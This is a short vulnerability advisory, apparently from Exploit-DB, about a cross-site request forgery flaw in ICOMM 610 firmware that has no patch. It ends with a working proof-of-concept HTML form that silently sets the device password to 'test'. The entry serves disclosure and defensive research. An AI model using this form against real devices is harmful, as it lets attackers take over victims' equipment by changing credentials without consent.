ICOMM 610 Cross-Site Request-Forgery Vulnerability

vendor:

ICOMM 610

by:

SecurityFocus

7,8

CVSS

HIGH

Cross-Site Request-Forgery

352

CWE

Product Name: ICOMM 610

Affected Version From: ICOMM 610 01.01.08.991 and prior

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

ICOMM 610 Cross-Site Request-Forgery Vulnerability

ICOMM 610 is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

Mitigation:

Implementing proper input validation and authentication can help mitigate the risk of this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable. 

<html>
  <!-- CSRF PoC --->
  <body>
    <form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
      <input type="hidden" name="PasswdEnable" value="on" />
      <input type="hidden" name="New_Passwd" value="test" />
      <input type="hidden" name="Confirm_New_Passwd" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>